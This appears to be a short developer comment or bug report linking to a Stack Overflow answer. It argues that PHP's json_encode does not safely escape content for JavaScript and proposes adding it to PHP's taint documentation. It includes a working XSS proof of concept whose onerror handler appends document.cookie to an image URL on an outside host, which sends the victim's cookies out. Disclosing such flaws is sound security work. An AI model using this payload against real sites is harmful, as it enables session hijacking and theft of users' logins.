http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653
A poc to steal cookie:
$xss=<<<EOL
<img id='id' src='http://balabla.com/xss.php?'>
<img src=# onerror=document.getElementById('id').src+=document.cookie>
EOL;
$arr['xss']=$xss;
echo json_encode($arr);
Actually json_encode is widly used to escape js.
I suggest add json_encode to http://php.net/manual/en/taint.detail.basic.php
http://stackoverflow.com/questions/5913503/xss-creating-a-javascript-object-using-phps-json-encode/40230653#40230653A poc to steal cookie:
Actually json_encode is widly used to escape js.
I suggest add json_encode to
http://php.net/manual/en/taint.detail.basic.php